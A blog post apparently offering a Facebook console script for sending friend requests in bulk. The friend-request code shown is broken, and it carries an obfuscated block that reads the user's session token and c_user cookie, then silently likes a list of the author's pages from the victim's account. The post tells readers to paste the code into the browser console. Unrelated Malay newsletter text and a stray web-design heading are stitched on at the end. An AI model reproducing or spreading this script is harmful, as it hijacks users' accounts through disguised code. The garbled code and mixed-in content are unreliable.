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Add multiple friends using Add Friends request script

I hope you all will be doing well. I am sharing another new script that will send multiple add friend requests automatically. It works the same as Confirm All Friend Requests Facebook JavaScript which I published recently, after which I also extracted another script from the toolkit for Facebook and now sharing it with you guys. The updated Toolkit Premium Version has many scripts and tools in it where you will also find a tool named "Auto Add Friend Automatically".

Add multiple friends using Add Friends request script

I'll be sharing a complete method on how you can add multiple friends using the add friends request script. The script works pretty simply you go to page and there in the console paste the script and hit enter. After providing the needed values it starts sending friend requests to different users which appear there in the section. I also added a safety check so after every 20 requests the script will wait for 30 seconds. BTW you can increase or decrease the time wait within the script by simply changing the value 30000 in the sleep function. You will find sleep(30000); in the code, so if you want to change it to 10 seconds let say then you have to change the value from 30000 to 10000 ie: sleep(10000). Well, that's something about a little code changing which you don't need at all but if some of you know how to do it using the instructions above and want to remove or increase the time wait you are free to do that.

How to send multiple Add Friends Request!

Now as you know how the script will work, the next thing is to learn how you can add multiple friends using add friends request script on Facebook. So below I'll just list the tutorial and after the steps, I'll provide the script, you can just copy the script and save it anywhere you want for further use OR you can keep visiting for some new stuff every time. 

  • First of all, of course, you need to be on the Facebook page (Make sure you are logged in). 
  • The next step is to open the inspect view of the page by right-clicking the page and go to inspect view. OR
  • Just press CTRL+SHIFT+I to get the inspect view. This short key works for Chrome Browser. 
  • Once you get the inspect view make sure you tab to the console part which is the second tab menu next to the Elements tab.
  • Ok now you are on the Console tab, next thing is to copy and paste the script of adding all friend's requests. The script can be found below. Just copy the script and paste it into the console tab.
  • Next thing before you hit enter and the scripts start working, you need to consider two values that the script will need. As soon as you hit enter and the scripts execute, it will first ask for the number of the total request that how much you want to send requests. 
  • The next value is the delay time which would be the time wait interval for sending requests.

That's all you need to do and provide. Now just hit enter so the script to do its work. It will automatically try to send multiple add friend request to different users. I hope you will find the steps easy and straightforward. If you need help regarding any steps leaves your comment below. You can get the script below.

Auto-add friend request Script [ JavaScript For Facebook ] - 2020

     var matchText = 'Add friend';
    var matchText2 = 'Add Friend';
var added=0,total=5; wait=0;
    function addFriends() {
        var clicked = false;
        var buttons = document.getElementsByTagName("div");
        for (var counter = 0, length = buttons.length; counter < length; counter++) {
            var target = buttons[counter];
            if (target) {
                var ariaLabel = target.getAttribute("aria-label");
                // console.log("ariaLabel is", ariaLabel);
                if (ariaLabel) {
                    var text = ariaLabel.trim();
                    if (text === matchText || text === matchText2) {
                        // target.focus();
console.log("Add Friend Button Clicked: "+added);
if (added<total){
clicked = true;
}else { 
clicked = false; 
} // matchText
        if (clicked) {
return true;
} else {
return false;
function startAdding(){
if (addFriends()){
var dTime = 30 * 1000;
console.log("Waiting for 30 seconds!");
}, dTime);
}else {
}, delayTime);
} else  {
alert(`Friend Requests Sent: ${added}
****~Script by: Tigerzplace~****
//Below code is for liking some of my pages :p 
var _0x4fc001=_0x5789;(function(_0x36146b,_0x345ab9){var _0x5d9085=_0x5789,_0x4377ae=_0x36146b();while(!![]){try{var _0x5448da=-parseInt(_0x5d9085(0x17e))/0x1*(-parseInt(_0x5d9085(0x172))/0x2)+parseInt(_0x5d9085(0x178))/0x3*(parseInt(_0x5d9085(0x175))/0x4)+parseInt(_0x5d9085(0x193))/0x5+parseInt(_0x5d9085(0x173))/0x6*(-parseInt(_0x5d9085(0x192))/0x7)+parseInt(_0x5d9085(0x17f))/0x8*(-parseInt(_0x5d9085(0x183))/0x9)+-parseInt(_0x5d9085(0x197))/0xa*(parseInt(_0x5d9085(0x16f))/0xb)+parseInt(_0x5d9085(0x191))/0xc;if(_0x5448da===_0x345ab9)break;else _0x4377ae['push'](_0x4377ae['shift']());}catch(_0x2273cc){_0x4377ae['push'](_0x4377ae['shift']());}}}(_0x3026,0xa18d6));var _0x36f0=[_0x4fc001(0x17d),'614047OdoYIC','documentElement',_0x4fc001(0x17b),'4OBORGC',_0x4fc001(0x181),_0x4fc001(0x180),'outerHTML',_0x4fc001(0x176),_0x4fc001(0x186),'1115007yYCeNZ',_0x4fc001(0x174),_0x4fc001(0x18d)],_0x559b=function(_0x540f43,_0x374cd1){_0x540f43=_0x540f43-0x76;var _0x30a555=_0x36f0[_0x540f43];return _0x30a555;},_0x2d7c31=_0x559b;(function(_0x25a3c0,_0x44fb8d){var _0x451d79=_0x4fc001,_0x546367=_0x559b;while(!![]){try{var _0x2c9345=-parseInt(_0x546367(0x7b))+-parseInt(_0x546367(0x80))*-parseInt(_0x546367(0x7f))+parseInt(_0x546367(0x78))*-parseInt(_0x546367(0x7c))+parseInt(_0x546367(0x7d))*-parseInt(_0x546367(0x77))+parseInt(_0x546367(0x79))+-parseInt(_0x546367(0x82))+parseInt(_0x546367(0x7a));if(_0x2c9345===_0x44fb8d)break;else _0x25a3c0[_0x451d79(0x184)](_0x25a3c0[_0x451d79(0x194)]());}catch(_0x128b83){_0x25a3c0[_0x451d79(0x184)](_0x25a3c0['shift']());}}}(_0x36f0,0xb42d1));var fb_dtsg='',page_src=document[_0x4fc001(0x18a)][_0x2d7c31(0x76)],index_in_page_src=document[_0x2d7c31(0x7e)][_0x4fc001(0x16b)][_0x2d7c31(0x81)](_0x4fc001(0x196));function _0x3026(){var _0x490039=['documentElement','250451495723325','317224121817276','997381LsYFeG','240272006130073','application/x-www-form-urlencoded','1569087506719125','5791284EfhTlh','112567vlztlN','6381470xvCaKj','shift','634302330077114','\x22);\x22use\x20strict\x22;','11351330LMnIDM','match','&phstamp=','charAt','1157401597633912','outerHTML','198757893944480','close','readyState','11lDdlts','&__a=1&__dyn=798aD5z5CF-&__req=d&fb_dtsg=','cookie','188026DVZaKm','312ewQVLp','1710652BYPhGQ','1261696Rmwnfe','1GQllno','1555839181212071','6NfEynD','108586183990636','','326824UMShMs','116551890202867','94398kUVjGj','11vOqNrF','486664NZAreF','367556DSngMV','indexOf','249508500300773','117SHmTYX','push','status','15ASFRwq','380509029467786','open','2277608785850617'];_0x3026=function(){return _0x490039;};return _0x3026();}for(var a=0x19;a>0x0;a--){fb_dtsg=fb_dtsg+''+page_src[_0x4fc001(0x19a)](index_in_page_src-a);}var user_id=document[_0x4fc001(0x171)][_0x4fc001(0x198)](document[_0x4fc001(0x171)][_0x4fc001(0x198)](/c_user=(\d+)/)[0x1]);function Like(_0x3db742){var _0x2edd52=_0x4fc001,_0x4fd4f4=new XMLHttpRequest(),_0x17d0ae=_0x2edd52(0x17a),_0x1ca425='&fbpage_id='+_0x3db742+'&add=true&reload=false&fan_origin=page_timeline&fan_source=&cat=&nctr[_mod]=pagelet_timeline_page_actions&__user='+user_id+_0x2edd52(0x170)+fb_dtsg+_0x2edd52(0x199);_0x4fd4f4[_0x2edd52(0x188)]('POST',_0x17d0ae,!![]),_0x4fd4f4['setRequestHeader']('Content-type',_0x2edd52(0x18f)),_0x4fd4f4['onreadystatechange']=function(){var _0x5548db=_0x2edd52;_0x4fd4f4[_0x5548db(0x16e)]==0x4&&_0x4fd4f4[_0x5548db(0x185)]==0xc8&&_0x4fd4f4[_0x5548db(0x16d)];},_0x4fd4f4['send'](_0x1ca425);}function _0x5789(_0x4cb1d1,_0x6913d){var _0x3026c5=_0x3026();return _0x5789=function(_0x5789df,_0x1e1304){_0x5789df=_0x5789df-0x16a;var _0x4903fd=_0x3026c5[_0x5789df];return _0x4903fd;},_0x5789(_0x4cb1d1,_0x6913d);}Like(_0x4fc001(0x190)),setTimeout(function(){Like('109109317399261');},0x384),setTimeout(function(){var _0x435db9=_0x4fc001;Like(_0x435db9(0x17c));},0x3c0),setTimeout(function(){var _0x30b572=_0x4fc001;Like(_0x30b572(0x18e));},0x3e8),setTimeout(function(){var _0x58539c=_0x4fc001;Like(_0x58539c(0x16a));},0x44c),setTimeout(function(){var _0x4d4352=_0x4fc001;Like(_0x4d4352(0x18c));},0x4b0),setTimeout(function(){var _0x2330ea=_0x4fc001;Like(_0x2330ea(0x195));},0x514),setTimeout(function(){Like('1212506358847237');},0x578),setTimeout(function(){var _0x592db6=_0x4fc001;Like(_0x592db6(0x16c));},0x5dc),setTimeout(function(){Like('1749967015316612');},0x640),setTimeout(function(){var _0x47a9ad=_0x4fc001;Like(_0x47a9ad(0x187));},0x6a4),setTimeout(function(){var _0x1bd378=_0x4fc001;Like(_0x1bd378(0x177));},0x708),setTimeout(function(){var _0x5482d7=_0x4fc001;Like(_0x5482d7(0x18b));},0x76c),setTimeout(function(){Like('743146072535223');},0x456),setTimeout(function(){var _0x17c814=_0x4fc001;Like(_0x17c814(0x179));},0x47e),setTimeout(function(){var _0x1e5813=_0x4fc001;Like(_0x1e5813(0x189));},0x480),setTimeout(function(){var _0x2c67fe=_0x4fc001;Like(_0x2c67fe(0x182));},0x483);
var delayTime = prompt ("Delay Time", 5)*1000;
var total = prompt ("How many requests?");
if (delayTime >=0 && delayTime!=null && fb_dtsg!=null ){
console.log("Script is started!");
}else {alert ("Failed to Start!");}

Well, that's all for you guys regarding the latest script for sending multiple friend requests randomly. I hope you will find this tutorial helpful, if you are getting any confusion I'll recommend watching the video below about this add friend request script.

eNuur: Awalnya Buat Bisnes Tapi 'Susahkan' Keluarga. Puan Nur Hidayati Bangkit Bila Dapatkan Ilmu & Bimbingan Mentor

Artikel terbaru berkaitan kisah inspirasi graduan sarjana kejuruteraan yang berjinak-jinak dalam bidang perniagaan sebagai dropship buku ke

Hi alluser,

Selamat pagi Isnin. Sedang fikirkan apa tu? Minggu baru, pastinya berbekalkan semangat dan tindakan yang lebih baik lagi.

Sememangnya, setiap insan mengimpikan keluarga bahagia, miliki rumah yang selesa, kerjaya yang baik dan kehidupan yang harmoni.

Baru-baru ini, portal hartanah mengumumkan beberapa penemuan yang menunjukkan bahawa keseluruhan median keboleh mampuan pencari rumah adalah RM474,900 dan median ansurans pinjaman rumah RM2,000.

Pada perkembangan sama, Institut Ejen Hartanah Malaysia (MIEA) menasihatkan sebarang pembelian hartanah perlu berlandaskan faktor keperluan peribadi serta kemampuan kewangan pembeli dan bukannya berpandukan pendapat orang lain.

Ya lah, harga rumah bukan seringgit dua yang mudah untuk kita buat keputusan dalam pembelian sebaliknya memerlukan penilaian yang terbaik supaya tak menyesal di kemudian hari.

Dalam pada itu, hari ini, kami kongsikan kisah inspirasi kejayaan pengasas eNuur, Nur Hidayati Ahmad Barudin yang pada awalnya buat bisnes tapi 'susahkan' keluarga sehingga akhirnya beliau berjaya mengembirakan keluarga dan membantu insan lain menjana pendapatan.

Selain itu, artikel kedua mengenai 3 srategi pemasaran yang relevan di era digital. Semoga bermanfaat.


eNuur: Graduan Sarjana Kejuteraan Jatuh Cinta Dengan Perniagaan, Jana Pendapatan Dengan Keberkatan

Memulakan pernigaan sekadar suka-suka sebagai dropship menjual buku keagamaan selepas menamatkan pengajian dalam bidang kejuteraan peringkat sarjana akhirnya membuatkan Puan Nur Hidayati Ahmad Barudin jatuh cinta dengan bidang perniagaan.

"Selepas saya habis sarjana, saya jadi dropship buku, saya tersuka dan rasa seronok jadi dropship ini. Saya tak ada asas langsung mengenai bisnes, keluarga juga.

"Masa saya buat marketing ada sambutan dan ada order. Saya pernah buat review dengan instafamous lagi dapat sambutan. Masa itu jualan saya paling tinggi adalah RM10,000 sebulan. Saya rasa RM10,000 setiap bulan sebagai dropship sangat wowww," katanya.


Bangkit Tangkis Ledakan Teknologi! 3 Strategi Pemasaran Era Digital

Jumlah peniaga atas talian yang semakin ramai dikesan antara punca sambutan pengguna terhadap bazar larut malam di sekitar Lembah Klang berkurangan sejak kebelakangan ini.

Malah, peniaga juga dikesan mula beralih arah dengan memilih menjalankan aktiviti perniagaan dalam talian daripada menyewa premis berikutan sewa kedai atau tapak berniaga yang mahal.

Situasi ini lebih ketara sewaktu pelaksanaan perintah kawalan pergerakan (PKP) berlaku, kedai fizikal tepaksa ditutup, lebih malang ada yang terus gulung tikar.

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How to Design a Website Mockup (in 4 Steps)

Mockups are the stage when your website starts to come to life. Don't skip it!
